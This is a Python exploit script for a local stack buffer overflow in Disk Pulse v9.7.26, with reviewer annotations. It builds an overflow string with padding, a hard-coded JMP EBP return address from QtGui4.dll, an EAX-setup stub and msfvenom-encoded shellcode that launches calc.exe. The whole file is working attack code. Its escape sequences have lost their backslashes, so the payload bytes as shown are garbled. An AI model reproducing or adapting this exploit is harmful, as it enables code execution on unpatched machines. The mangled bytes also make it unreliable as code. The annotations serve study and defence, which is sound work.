#!/usr/bin/python

###############################################################################
# Exploit Title: Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow

###############################################################################
# Exploit Title: Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow
# Date: 12-06-2017
# Exploit Author: abatchy17 -- @abatchy17
# Vulnerable Software: Disk Pulse v9.7.26 (Freeware, Pro, Ultimate)
# Vendor Homepage: http://www.diskpulse.com/
# Version: 9.7.14
# Software Link: http://www.diskpulse.com/downloads.html (Freeware, Pro, Ultimate)
# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit:
# 1. Under Directories, click the plus sign
# 2. Paste content of exploit.txt in Add Directory textbox.
#
# <--- Marry and reproduce --->
#
##############################################################################

# Output file for the crafted input that the header says is pasted into the
# "Add Directory" textbox. NOTE(review): opened without a context manager; a
# `with open("exploit.txt", "w") as a:` block would close it even if the
# write below fails.
a = open("exploit.txt", "w")

# Byte values excluded when the payload was encoded (the `-b` list on the
# msfvenom command line below). NOTE(review): throughout this file the escape
# sequences appear to have lost their backslashes during extraction ("x0a"
# rather than "\x0a"), so as written every "xNN" is a three-character ASCII
# token, not a single byte, and the byte-offset reasoning in the comments
# below does not hold for the text exactly as shown.
badchars = "x0ax0dx2f"

# Encoder-generated payload. The command line records the encoder as
# x86/alpha_mixed with BufferRegister=EAX, i.e. the decoder expects EAX to
# hold the address of its own first byte when it starts running; the stub
# further down is what computes that value. The payload only launches
# calc.exe, a harmless proof-of-concept marker.
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "x0ax0dx2f"
buf = ""
buf += "x50x59x49x49x49x49x49x49x49x49x49x49x49"
buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30"
buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42"
buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49"
buf += "x6bx4cx5ax48x4fx72x57x70x75x50x43x30x43"
buf += "x50x4bx39x4dx35x44x71x79x50x63x54x6ex6b"
buf += "x62x70x76x50x6ex6bx42x72x46x6cx6ex6bx63"
buf += "x62x62x34x6cx4bx43x42x76x48x36x6fx68x37"
buf += "x73x7ax46x46x74x71x49x6fx4ex4cx57x4cx55"
buf += "x31x51x6cx35x52x46x4cx51x30x6ax61x6ax6f"
buf += "x64x4dx67x71x6bx77x79x72x68x72x70x52x70"
buf += "x57x6cx4bx53x62x36x70x6cx4bx52x6ax67x4c"
buf += "x4cx4bx50x4cx62x31x42x58x79x73x32x68x37"
buf += "x71x4ax71x73x61x4ex6bx63x69x31x30x35x51"
buf += "x69x43x4cx4bx50x49x64x58x58x63x46x5ax32"
buf += "x69x6ex6bx36x54x4ex6bx57x71x38x56x65x61"
buf += "x49x6fx6ex4cx69x51x7ax6fx66x6dx46x61x69"
buf += "x57x70x38x39x70x33x45x39x66x35x53x31x6d"
buf += "x68x78x75x6bx73x4dx71x34x70x75x38x64x33"
buf += "x68x4ex6bx32x78x51x34x65x51x39x43x31x76"
buf += "x4cx4bx64x4cx32x6bx6ex6bx62x78x65x4cx47"
buf += "x71x59x43x4cx4bx44x44x4cx4bx56x61x38x50"
buf += "x6fx79x52x64x54x64x34x64x63x6bx73x6bx50"
buf += "x61x50x59x71x4ax56x31x59x6fx59x70x33x6f"
buf += "x53x6fx71x4ax4cx4bx44x52x68x6bx6ex6dx53"
buf += "x6dx62x4ax56x61x4cx4dx6bx35x6dx62x75x50"
buf += "x45x50x75x50x32x70x32x48x76x51x4ex6bx30"
buf += "x6fx6fx77x39x6fx4ex35x4dx6bx58x70x4dx65"
buf += "x4ex42x53x66x62x48x6dx76x4ax35x6dx6dx4d"
buf += "x4dx69x6fx79x45x57x4cx46x66x53x4cx56x6a"
buf += "x6fx70x49x6bx6dx30x33x45x33x35x4dx6bx50"
buf += "x47x37x63x74x32x52x4fx53x5ax43x30x53x63"
buf += "x49x6fx38x55x52x43x63x51x50x6cx65x33x54"
buf += "x6ex62x45x54x38x62x45x55x50x41x41"

# 0x651c541f : jmp ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:Program FilesDisk PulseinQtGui4.dll)
# NOTE(review): the module path in the line above also looks extraction-mangled
# (directory separators dropped). The "ASLR: False, Rebase: False, SafeSEH:
# False" flags are what make a hard-coded module address reliable across
# runs; building and shipping every DLL with those mitigations enabled is the
# corresponding fix on the defender's side.

# The address above written as four little-endian bytes: 1f 54 1c 65.
jmpebp = "x1fx54x1cx65" # Why JMP EBP? Buffer at ESP is split, bad! Example: EBP: AAABBB, ESP -> AAA (without the BBB part)

# Short stub that derives EAX from EBP so it lands on the first byte of `buf`
# (the alpha_mixed decoder was generated with BufferRegister=EAX). The three
# add immediates sum to 0x200 as the inline comments work out, and the final
# inc makes it EBP + 0x201. Only 0x55/0x56 are used in the immediates, so the
# stub itself stays inside the printable-ASCII range like the rest.
llamaleftovers = (
"x55" # push EBP
"x58" # pop EAX
"x05x55x55x55x55" # add EAX, 0x55555555
"x05x55x55x55x55" # add EAX, 0x55555555
"x05x56x56x55x55" # add EAX, 0x55555656 -> EAX = EBP + 0x200
"x40" # inc EAX, shellcode generated should start exactly here (EBP + 0x201) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)

# Filler between the stub and `buf`: one push EBP followed by 107 push ebx /
# pop ebx pairs (0x53 / 0x5b), which execute as no-ops. Its length is what
# places `buf` at the EBP + 0x201 offset the stub assumes.
junk = "x55" + "x53x5b" * 107

# Final layout: 4096 bytes of padding, the jmp-ebp address, 20 inc/dec EAX
# pairs (0x40 / 0x48) that act as a harmless landing pad, the stub, the
# filler, then the encoded payload.
data = "A"*4096 + jmpebp + "x40x48" * 20 + llamaleftovers + junk + buf

a.write(data)
a.close()